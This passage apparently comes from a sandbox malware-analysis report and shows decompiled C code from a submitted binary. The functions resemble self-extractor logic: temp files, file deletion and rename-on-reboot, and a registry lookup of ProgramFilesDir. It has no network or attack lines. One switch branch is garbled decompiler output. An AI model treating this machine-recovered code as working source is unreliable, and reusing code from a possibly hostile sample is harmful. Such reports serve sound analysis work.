                											 *((char*)(_t331 + _t240 + 0x2208)) = 0;
                										}
                										__eflags =  *(_t240 + 0x2106);
                										if( *(_t240 + 0x2106) != 0) {
                											 *((intOrPtr*)(_t240 + 0x2308)) = E003DCCFB();
                										}
                										__eflags =  *(_t240 + 0x2107);
                										if( *(_t240 + 0x2107) != 0) {
                											 *((intOrPtr*)(_t240 + 0x230c)) = E003DCCFB();
                										}
                										 *((char*)(_t240 + 0x2105)) = 1;
                										goto L94;
                									}
                									if(_t330 != 1) {
                										goto L94;
                									}
                									_t340 = _t247;
                									if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t315 + 0x18)) - _t313 == 1) {
                										_t340 = _t247 + 1;
                									}
                									_t334 = _t240 + 0x1028;
                									E003D20BD(_t334, _t340);
                									_push(_t340);
                									_push( *_t334);
                									goto L37;
                								}
                							} else {
                								L94:
                								_t248 = _a8;
                								 *(_t315 + 0x1c) = _t248;
                								_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t248;
                								if(_t135 >= 2) {
                									continue;
                								}
                								break;
                							}
                						}
                					}
                				}
                			}

                APIs
                • _swprintf.LIBCMT ref: 003D2536
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: __vswprintf_c_l_swprintf_wcslen
                • String ID: ;%u$x%u$xc%u
                • API String ID: 3053425827-2277559157
                • Opcode ID: fb1865f790fa67e6ff07cfcb19b2833da606a1c16c39bac1a46f6f25667e6fae
                • Instruction ID: 3333983dd2f9cb041bff613c14cd9bedf37caf969e6f40cdbd4045086485eb8f
                • Opcode Fuzzy Hash: fb1865f790fa67e6ff07cfcb19b2833da606a1c16c39bac1a46f6f25667e6fae
                • Instruction Fuzzy Hash: 40F118726183815BCB17DB24A495BFB779A5FA0300F08056BFE869F383CB649946C762
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E003E9CFE(void* __eflags, signed short* _a4) {
                				signed int* _v4;
                				intOrPtr _v8;
                				void* __ecx;
                				signed int* _t17;
                				signed int _t18;
                				void* _t21;
                				void* _t22;
                				void* _t24;
                				signed short _t25;
                				void* _t26;
                				signed int _t27;
                				signed int _t28;
                				signed short* _t29;
                				void* _t30;
                				signed int _t31;
                				signed int _t32;
                				void* _t33;
                				signed int _t36;
                				void* _t38;
                				signed int _t42;
                				signed int _t43;
                				signed int _t44;
                				signed short _t45;
                				signed int _t47;
                				short _t49;
                				signed int _t50;
                				signed int _t51;
                				signed int _t52;
                				signed short* _t53;
                				signed int* _t55;
                				short* _t56;
                				short* _t57;
                				signed short* _t58;
                				signed int* _t59;
                				intOrPtr _t60;
                				signed int* _t77;
                
                				_t58 = _a4;
                				_push(2 + E003F3E13(_t58) * 2);
                				_t17 = E003F3E33(_t38);
                				_t59 = _t17;
                				_v4 = _t59;
                				if(_t59 == 0) {
                					return _t17;
                				}
                				_t18 = E003E95AA(_t58);
                				_t42 =  *_t58 & 0x0000ffff;
                				_t36 = _t18;
                				_t55 = _t59;
                				if(_t42 == 0) {
                					L47:
                					return _t59;
                				} else {
                					_push(0xd);
                					_push(0x20);
                					_v8 = 0x3e;
                					do {
                						_t43 = _t42 & 0x0000ffff;
                						while(_t43 != 0x3c) {
                							if(_t36 == 0) {
                								L11:
                								_t36 = 0;
                								__eflags = 0;
                								if(0 == 0) {
                									L20:
                									_t27 =  *_t58 & 0x0000ffff;
                									__eflags = _t27;
                									if(__eflags == 0) {
                										L27:
                										_t28 =  *_t58 & 0x0000ffff;
                										_t52 = 0x20;
                										_t43 = _t28;
                										_t72 = _t28;
                										_t26 = 0xd;
                										if(_t28 != 0) {
                											continue;
                										}
                										break;
                									}
                									__eflags = _t27 - _t52;
                									if(__eflags != 0) {
                										L24:
                										 *_t55 = _t27;
                										L25:
                										_t55 =  &(_t55[0]);
                										L26:
                										_t58 =  &(_t58[1]);
                										goto L27;
                									}
                									__eflags = _t55 - _t59;
                									if(__eflags == 0) {
                										goto L24;
                									}
                									__eflags =  *((intOrPtr*)(_t55 - 2)) - _t52;
                									if(__eflags == 0) {
                										goto L26;
                									}
                									goto L24;
                								}
                								__eflags = _t43 - 0x26;
                								if(_t43 != 0x26) {
                									goto L20;
                								}
                								_t29 = 0;
                								__eflags = 0;
                								do {
                									_t53 = _t29 + _t58;
                									_t47 =  *_t53 & 0x0000ffff;
                									__eflags = _t47;
                									if(_t47 == 0) {
                										break;
                									}
                									__eflags = _t47 - 0x3b;
                									if(_t47 == 0x3b) {
                										_t8 =  &(_t53[1]); // 0x22
                										_t58 = _t8;
                										_t36 = 1;
                									}
                									_t29 = _t29 + 2;
                									__eflags = _t29 - 0x28;
                								} while (_t29 < 0x28);
                								__eflags = _t36;
                								if(__eflags != 0) {
                									goto L27;
                								}
                								_t52 = 0x20;
                								goto L20;
                							}
                							if(_t43 == _t26) {
                								L8:
                								if(_t55 == _t59 ||  *((intOrPtr*)(_t55 - 2)) != _t52) {
                									 *_t55 = _t52;
                									goto L25;
                								} else {
                									goto L26;
                								}
                							}
                							_t30 = 0xa;
                							if(_t43 != _t30) {
                								goto L11;
                							}
                							goto L8;
                						}
                						_t21 = E003E1FDD(_t72, _t58, L"</p>", 4);
                						_t36 = _t36 & 0xffffff00 | _t21 == 0x00000000;
                						_t74 = _t21;
                						if(_t21 == 0 || E003E1FDD(_t74, _t58, L"<br>", 4) == 0) {
                							_t44 = 0xd;
                							_t22 = 2;
                							 *_t55 = _t44;
                							_t56 = _t55 + _t22;
                							_t49 = 0xa;
                							 *_t56 = _t49;
                							_t55 = _t56 + _t22;
                							if(_t36 != 0) {
                								 *_t55 = _t44;
                								_t57 = _t55 + _t22;
                								 *_t57 = _t49;
                								_t55 = _t57 + _t22;
                								_t77 = _t55;
                							}
                						}
                						 *_t55 = 0;
                						_t24 = E003E1FDD(_t77, _t58, L"<style>", 7);
                						_t45 =  *_t58 & 0x0000ffff;
                						_t50 = _t45;
                						if(_t24 != 0) {
                							_t51 = _t45;
                							__eflags = _t45;
                							if(_t45 == 0) {
                								L44:
                								_t25 = _t51 & 0x0000ffff;
                								__eflags = _t51 - _v8;
                								if(__eflags == 0) {
                									_t58 =  &(_t58[1]);
                									__eflags = _t58;
                									_t25 =  *_t58 & 0x0000ffff;
                								}
                								goto L46;
                							}
                							_t60 = _v8;
                							while(1) {
                								_t51 = _t45 & 0x0000ffff;
                								__eflags = _t45 - _t60;
                								if(_t45 == _t60) {
                									break;
                								}
                								_t58 =  &(_t58[1]);
                								_t31 =  *_t58 & 0x0000ffff;
                								_t45 = _t31;
                								_t51 = _t31;
                								__eflags = _t31;
                								if(_t31 != 0) {
                									continue;
                								}
                								break;
                							}
                							_t59 = _v4;
                							goto L44;
                						} else {
                							_t32 = _t50;
                							_t79 = _t45;
                							if(_t45 == 0) {
                								L38:
                								_t25 = _t32 & 0x0000ffff;
                								goto L46;
                							} else {
                								goto L34;
                							}
                							while(1) {
                								L34:
                								_t33 = E003E1FDD(_t79, _t58, L"</style>", 8);
                								_t58 =  &(_t58[1]);
                								if(_t33 == 0) {
                									break;
                								}
                								_t32 =  *_t58 & 0x0000ffff;
                								if(_t32 != 0) {
                									continue;
                								}
                								goto L38;
                							}
                							_t58 =  &(_t58[7]);
                							__eflags = _t58;
                							_t32 =  *_t58 & 0x0000ffff;
                							goto L38;
                						}
                						L46:
                						_t52 = 0x20;
                						_t42 = _t25 & 0x0000ffff;
                						_t26 = 0xd;
                					} while (_t25 != 0);
                					goto L47;
                				}
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: </p>$</style>$<br>$<style>$>
                • API String ID: 176396367-3568243669
                • Opcode ID: 8452bdd56516e4927ccdb3deabf5a3376e02ebc2a95b056a44d7dcebf271ec27
                • Instruction ID: e81dd6ad98059f443efe9252e8fecec6bc2261e4dc81273a778799bd90db89e8
                • Opcode Fuzzy Hash: 8452bdd56516e4927ccdb3deabf5a3376e02ebc2a95b056a44d7dcebf271ec27
                • Instruction Fuzzy Hash: DA51F5666403F295DB329A279C1177773A4DFA1750F6A072BEA819B1C0FBA58C818361
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E003FF68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				long _v36;
                				intOrPtr _v40;
                				void* _v44;
                				signed int _v48;
                				signed char* _v52;
                				long _v56;
                				int _v60;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t78;
                				signed int _t80;
                				int _t86;
                				void* _t92;
                				void* _t94;
                				long _t97;
                				void _t105;
                				void* _t112;
                				signed int _t115;
                				signed int _t117;
                				signed char _t122;
                				signed char _t127;
                				signed int _t128;
                				signed char* _t129;
                				intOrPtr* _t130;
                				signed int _t131;
                				void* _t132;
                
                				_t78 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t78 ^ _t131;
                				_t80 = _a8;
                				_t117 = _t80 >> 6;
                				_t115 = (_t80 & 0x0000003f) * 0x30;
                				_t129 = _a12;
                				_v52 = _t129;
                				_v48 = _t117;
                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x432290 + _t117 * 4)) + _t115 + 0x18));
                				_v40 = _a16 + _t129;
                				_t86 = GetConsoleCP();
                				_t130 = _a4;
                				_v60 = _t86;
                				 *_t130 = 0;
                				 *((intOrPtr*)(_t130 + 4)) = 0;
                				 *((intOrPtr*)(_t130 + 8)) = 0;
                				while(_t129 < _v40) {
                					_v28 = 0;
                					_v31 =  *_t129;
                					_t128 =  *(0x432290 + _v48 * 4);
                					_t122 =  *(_t128 + _t115 + 0x2d);
                					if((_t122 & 0x00000004) == 0) {
                						_t92 = E003FA767(_t115, _t128);
                						_t128 = 0x8000;
                						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
                							_push(1);
                							_push(_t129);
                							goto L8;
                						} else {
                							if(_t129 >= _v40) {
                								_t128 = _v48;
                								 *((char*)( *((intOrPtr*)(0x432290 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
                								 *( *((intOrPtr*)(0x432290 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x432290 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
                								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
                							} else {
                								_t112 = E003F930D( &_v28, _t129, 2);
                								_t132 = _t132 + 0xc;
                								if(_t112 != 0xffffffff) {
                									_t129 =  &(_t129[1]);
                									goto L9;
                								}
                							}
                						}
                					} else {
                						_t127 = _t122 & 0x000000fb;
                						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
                						_push(2);
                						_v15 = _t127;
                						 *(_t128 + _t115 + 0x2d) = _t127;
                						_push( &_v16);
                						L8:
                						_push( &_v28);
                						_t94 = E003F930D();
                						_t132 = _t132 + 0xc;
                						if(_t94 != 0xffffffff) {
                							L9:
                							_t129 =  &(_t129[1]);
                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                							_v56 = _t97;
                							if(_t97 != 0) {
                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                									L19:
                									 *_t130 = GetLastError();
                								} else {
                									_t48 = _t130 + 8; // 0xff76e900
                									 *((intOrPtr*)(_t130 + 4)) =  *_t48 - _v52 + _t129;
                									if(_v36 >= _v56) {
                										if(_v31 != 0xa) {
                											goto L16;
                										} else {
                											_t105 = 0xd;
                											_v32 = _t105;
                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                												goto L19;
                											} else {
                												if(_v36 >= 1) {
                													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
                													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
                													goto L16;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                					goto L20;
                					L16:
                				}
                				L20:
                				return E003EFBBC(_t130, _t115, _v8 ^ _t131, _t128, _t129, _t130);
                			}


                APIs
                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,003FFE02,00000000,00000000,00000000,00000000,00000000,003F529F), ref: 003FF6CF
                • __fassign.LIBCMT ref: 003FF74A
                • __fassign.LIBCMT ref: 003FF765
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 003FF78B
                • WriteFile.KERNEL32(?,00000000,00000000,003FFE02,00000000,?,?,?,?,?,?,?,?,?,003FFE02,00000000), ref: 003FF7AA
                • WriteFile.KERNEL32(?,00000000,00000001,003FFE02,00000000,?,?,?,?,?,?,?,?,?,003FFE02,00000000), ref: 003FF7E3
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: a2c6efc79a7714e47efabdca9cb2525887507084d4e87ca9b51c7181b291800c
                • Instruction ID: 1373e60a7e71b78eeca56a56368fa7074f91014c73d668fab319ce1ceb2c20fe
                • Opcode Fuzzy Hash: a2c6efc79a7714e47efabdca9cb2525887507084d4e87ca9b51c7181b291800c
                • Instruction Fuzzy Hash: 515196B1D002499FCB11CFA4DD45AEEFBF8EF09300F15416AEA55E7251E770A941CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E003ECE87(intOrPtr __ebx, void* __ecx, void* __edx) {
                				intOrPtr _t225;
                				void* _t226;
                				signed int _t292;
                				void* _t294;
                				signed int _t295;
                				void* _t299;
                
                				L0:
                				while(1) {
                					L0:
                					if(__ebx != 1) {
                						goto L123;
                					}
                					L107:
                					__eax = __ebp - 0x788c;
                					__edi = 0x800;
                					GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
                					__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
                					__ebx = 0;
                					__esi = 0;
                					_push(0);
                					while(1) {
                						L109:
                						_push( *0x40e724);
                						__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
                						__eax = E003DA231(0x41946a);
                						__eflags = __al;
                						if(__al == 0) {
                							break;
                						}
                						L108:
                						__esi =  &(__esi->i);
                						__eflags = __esi;
                						_push(__esi);
                					}
                					L110:
                					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
                					__eflags =  *(__ebp - 0x588c) - __bx;
                					if( *(__ebp - 0x588c) == __bx) {
                						while(1) {
                							L175:
                							_push(0x1000);
                							_t213 = _t299 - 0x15; // 0xffffa75f
                							_t214 = _t299 - 0xd; // 0xffffa767
                							_t215 = _t299 - 0x588c; // 0xffff4ee8
                							_t216 = _t299 - 0xf894; // 0xfffeaee0
                							_push( *((intOrPtr*)(_t299 + 0xc)));
                							_t225 = E003EB314(0x800, _t299);
                							_t277 =  *((intOrPtr*)(_t299 + 0x10));
                							 *((intOrPtr*)(_t299 + 0xc)) = _t225;
                							if(_t225 != 0) {
                								_t226 = _t299 - 0x588c;
                								_t294 = _t299 - 0x1b894;
                								_t292 = 6;
                								goto L2;
                							} else {
                								break;
                							}
                							L4:
                							while(E003E1FBB(_t299 - 0xf894,  *((intOrPtr*)(0x40e744 + _t295 * 4))) != 0) {
                								_t295 = _t295 + 1;
                								if(_t295 < 0xe) {
                									continue;
                								} else {
                									goto L175;
                								}
                							}
                							__eflags = _t295 - 0xd;
                							if(__eflags > 0) {
                								continue;
                							}
                							L8:
                							switch( *((intOrPtr*)(_t295 * 4 +  &M003ED41B))) {
                								case 0:
                									L9:
                									__eflags = _t277 - 2;
                									if(_t277 == 2) {
                										E003EA64D(_t299 - 0x788c, 0x800);
                										E003DA544(E003DBDF3(__eflags, _t299 - 0x788c, _t299 - 0x588c, _t299 - 0xd894, 0x800), _t277, _t299 - 0x8894, _t295);
                										 *(_t299 - 4) = 0;
                										E003DA67E(_t299 - 0x8894, _t299 - 0xd894);
                										E003D6EDB(_t299 - 0x388c);
                										while(1) {
                											L23:
                											_push(0);
                											_t240 = E003DA5D1(_t299 - 0x8894, _t299 - 0x388c);
                											__eflags = _t240;
                											if(_t240 == 0) {
                												break;
                											}
                											L11:
                											SetFileAttributesW(_t299 - 0x388c, 0);
                											__eflags =  *(_t299 - 0x2880);
                											if(__eflags == 0) {
                												L16:
                												_t244 = GetFileAttributesW(_t299 - 0x388c);
                												__eflags = _t244 - 0xffffffff;
                												if(_t244 == 0xffffffff) {
                													continue;
                												}
                												L17:
                												_t246 = DeleteFileW(_t299 - 0x388c);
                												__eflags = _t246;
                												if(_t246 != 0) {
                													continue;
                												} else {
                													_t297 = 0;
                													_push(0);
                													goto L20;
                													L20:
                													E003D4092(_t299 - 0x1044, 0x800, L"%s.%d.tmp", _t299 - 0x388c);
                													_t301 = _t301 + 0x14;
                													_t251 = GetFileAttributesW(_t299 - 0x1044);
                													__eflags = _t251 - 0xffffffff;
                													if(_t251 != 0xffffffff) {
                														_t297 = _t297 + 1;
                														__eflags = _t297;
                														_push(_t297);
                														goto L20;
                													} else {
                														_t254 = MoveFileW(_t299 - 0x388c, _t299 - 0x1044);
                														__eflags = _t254;
                														if(_t254 != 0) {
                															MoveFileExW(_t299 - 0x1044, 0, 4);
                														}
                														continue;
                													}
                												}
                											}
                											L12:
                											E003DB991(__eflags, _t299 - 0x788c, _t299 - 0x1044, 0x800);
                											E003DB690(__eflags, _t299 - 0x1044, 0x800);
                											_t298 = E003F3E13(_t299 - 0x788c);
                											__eflags = _t298 - 4;
                											if(_t298 < 4) {
                												L14:
                												_t265 = E003DBDB4(_t299 - 0x588c);
                												__eflags = _t265;
                												if(_t265 != 0) {
                													break;
                												}
                												L15:
                												_t268 = E003F3E13(_t299 - 0x388c);
                												__eflags = 0;
                												 *((short*)(_t299 + _t268 * 2 - 0x388a)) = 0;
                												E003EFFF0(0x800, _t299 - 0x44, 0, 0x1e);
                												_t301 = _t301 + 0x10;
                												 *((intOrPtr*)(_t299 - 0x40)) = 3;
                												_push(0x14);
                												_pop(_t271);
                												 *((short*)(_t299 - 0x34)) = _t271;
                												 *((intOrPtr*)(_t299 - 0x3c)) = _t299 - 0x388c;
                												_push(_t299 - 0x44);
                												 *0x43307c();
                												goto L16;
                											}
                											L13:
                											_t276 = E003F3E13(_t299 - 0x1044);
                											__eflags = _t298 - _t276;
                											if(_t298 > _t276) {
                												goto L15;
                											}
                											goto L14;
                										}
                										L24:
                										 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
                										E003DA55A(_t299 - 0x8894);
                									}
                									goto L175;
                								case 1:
                									L25:
                									__eflags = __ebx;
                									if(__ebx != 0) {
                										goto L175;
                									} else {
                										__eax =  *0x42fc94;
                										__eflags = __eax;
                										__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
                										__eflags = __eax;
                										if(__eax != 0) {
                											__eax =  *0x42fc94;
                											_pop(__ecx);
                											_pop(__ecx);
                										}
                										__bh =  *((intOrPtr*)(__ebp - 0xd));
                										__eflags = __bh;
                										if(__eflags == 0) {
                											__eax = __ebp + 0xc;
                											_push(__ebp + 0xc);
                											__esi = E003EB48E(__ecx, __edx, __eflags);
                											__eax =  *0x42fc94;
                										} else {
                											__esi = __ebp - 0x588c;
                										}
                										__eflags = __bl;
                										if(__bl == 0) {
                											__edi = __eax;
                										}
                										L33:
                										__eax = E003F3E13(__esi);
                										__eax = __eax + __edi;
                										_push(__eax);
                										_push( *0x42fc94);
                										__eax = E003F3E3E(__ecx, __edx);
                										__esp = __esp + 0xc;
                										__eflags = __eax;
                										if(__eax == 0) {
                											L37:
                											__eflags = __bh;
                											if(__bh == 0) {
                												__eax = L003F3E2E(__esi);
                											}
                											goto L175;
                										}
                										L34:
                										 *0x42fc94 = __eax;
                										__eflags = __bl;
                										if(__bl != 0) {
                											__ecx = 0;
                											__eflags = 0;
                											 *__eax = __cx;
                										}
                										L36:
                										__eax = E003F7686(__eax, __esi);
                										_pop(__ecx);
                										_pop(__ecx);
                										goto L37;
                									}
                								case 2:
                									L39:
                									__eflags = __ebx;
                									if(__ebx == 0) {
                										__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
                									}
                									goto L175;
                								case 3:
                									L41:
                									__eflags = __ebx;
                									if(__ebx != 0) {
                										goto L175;
                									}
                									L42:
                									__eflags =  *0x41a472 - __di;
                									if( *0x41a472 != __di) {
                										goto L175;
                									}
                									L43:
                									__eax = 0;
                									__edi = __ebp - 0x588c;
                									_push(0x22);
                									 *(__ebp - 0x1044) = __ax;
                									_pop(__eax);
                									__eflags =  *(__ebp - 0x588c) - __ax;
                									if( *(__ebp - 0x588c) == __ax) {
                										__edi = __ebp - 0x588a;
                									}
                									__eax = E003F3E13(__edi);
                									__esi = 0x800;
                									__eflags = __eax - 0x800;
                									if(__eax >= 0x800) {
                										goto L175;
                									} else {
                										L46:
                										__eax =  *__edi & 0x0000ffff;
                										_push(0x5c);
                										_pop(__ecx);
                										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                										if(( *__edi & 0x0000ffff) != 0x2e) {
                											L50:
                											__eflags = __ax - __cx;
                											if(__ax == __cx) {
                												L62:
                												__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
                												__ebx = 0;
                												__eflags = 0;
                												L63:
                												_push(0x22);
                												_pop(__eax);
                												__eax = __ebp - 0x1044;
                												__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
                												_pop(__ecx);
                												_pop(__ecx);
                												__eflags = __eax;
                												if(__eax != 0) {
                													__eflags =  *(__eax + 2) - __bx;
                													if( *(__eax + 2) == __bx) {
                														__ecx = 0;
                														__eflags = 0;
                														 *__eax = __cx;
                													}
                												}
                												__eax = __ebp - 0x1044;
                												__edi = 0x41a472;
                												E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
                												__eax = E003EB1BE(__ebp - 0x1044, __esi);
                												__esi = GetDlgItem( *(__ebp + 8), 0x66);
                												__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
                												__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
                												__eax = __ebp - 0x1044;
                												__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
                												_pop(__ecx);
                												_pop(__ecx);
                												__eflags = __eax;
                												if(__eax != 0) {
                													__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
                												}
                												goto L175;
                											}
                											L51:
                											__eflags = __ax;
                											if(__ax == 0) {
                												L53:
                												__eax = __ebp - 0x1c;
                												__ebx = 0;
                												_push(__ebp - 0x1c);
                												_push(1);
                												_push(0);
                												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                												_push(0x80000002);
                												__eax =  *0x433028();
                												__eflags = __eax;
                												if(__eax == 0) {
                													__eax = __ebp - 0x14;
                													 *(__ebp - 0x14) = 0x1000;
                													_push(__ebp - 0x14);
                													__eax = __ebp - 0x1044;
                													_push(__ebp - 0x1044);
                													__eax = __ebp - 0x24;
                													_push(__ebp - 0x24);
                													_push(0);
                													_push(L"ProgramFilesDir");
                													_push( *(__ebp - 0x1c));
                													__eax =  *0x433024();
                													_push( *(__ebp - 0x1c));
                													 *0x433008() =  *(__ebp - 0x14);
                													__ecx = 0x7ff;
                													__eax =  *(__ebp - 0x14) >> 1;
                													__eflags = __eax - 0x7ff;
                													if(__eax >= 0x7ff) {
                														__eax = 0x7ff;
                													}
                													__ecx = 0;
                													__eflags = 0;
                													 *(__ebp + __eax * 2 - 0x1044) = __cx;
                												}
                												__eflags =  *(__ebp - 0x1044) - __bx;
                												if( *(__ebp - 0x1044) != __bx) {
                													__eax = __ebp - 0x1044;
                													__eax = E003F3E13(__ebp - 0x1044);
                													_push(0x5c);
                													_pop(__ecx);
                													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
                													if(__eflags != 0) {
                														__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
                													}
                												}
                												__esi = E003F3E13(__edi);
                												__eax = __ebp - 0x1044;
                												__eflags = __esi - 0x7ff;
                												__esi = 0x800;
                												if(__eflags < 0) {
                													__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
                												}
                												goto L63;
                											}
                											L52:
                											__eflags =  *((short*)(__edi + 2)) - 0x3a;
                											if( *((short*)(__edi + 2)) == 0x3a) {
                												goto L62;
                											}
                											goto L53;
                										}
                										L47:
                										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                										if( *((intOrPtr*)(__edi + 2)) != __cx) {
                											goto L51;
                										}
                										L48:
                										__edi = __edi + 4;
                										__ebx = 0;
                										__eflags =  *__edi - __bx;
                										if( *__edi == __bx) {
                											goto L175;
                										}
                										L49:
                										__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
                										goto L63;
                									}
                								case 4:
                									L68:
                									__eflags =  *0x41a46c - 1;
                									__eflags = __eax - 0x41a46c;
                									 *__edi =  *__edi + __ecx;
                									__eflags =  *(__edx + 7) & __al;
                									 *__eax =  *__eax + __al;
                									__eflags =  *__eax;
                								case 5:
                									L73:
                									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                									__ecx = 0;
                									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                									__eflags = __eax;
                									if(__eax == 0) {
                										L80:
                										 *0x418457 = __cl;
                										 *0x418460 = 1;
                										goto L175;
                									}
                									L74:
                									__eax = __eax - 0x30;
                									__eflags = __eax;
                									if(__eax == 0) {
                										L78:
                										 *0x418457 = __cl;
                										L79:
                										 *0x418460 = __cl;
                										goto L175;
                									}
                									L75:
                									__eax = __eax - 1;
                									__eflags = __eax;
                									if(__eax == 0) {
                										goto L80;
                									}
                									L76:
                									__eax = __eax - 1;
                									__eflags = __eax;
                									if(__eax != 0) {
                										goto L175;
                									}
                									L77:
                									 *0x418457 = 1;
                									goto L79;
                								case 6:
                									L86:
                									__edi = 0;
                									 *0x41c577 = 1;
                									__edi = 1;
                									__eax = __ebp - 0x588c;
                									__eflags =  *(__ebp - 0x588c) - 0x3c;
                									__ebx = __esi;
                									 *(__ebp - 0x14) = __eax;
                									if( *(__ebp - 0x588c) != 0x3c) {
                										L97:
                										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
                										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
                											L100:
                											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
                											if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
                												goto L175;
                											}
                											L101:
                											__eflags = __ebx - 6;
                											if(__ebx != 6) {
                												goto L175;
                											}
                											L102:
                											__ecx = 0;
                											__eflags = 0;
                											_push(0);
                											L103:
                											_push(__edi);
                											_push(__eax);
                											_push( *(__ebp + 8));
                											__eax = E003ED78F(__ebp);
                											goto L175;
                										}
                										L98:
                										__eflags = __ebx - 9;
                										if(__ebx != 9) {
                											goto L175;
                										}
                										L99:
                										_push(1);
                										goto L103;
                									}
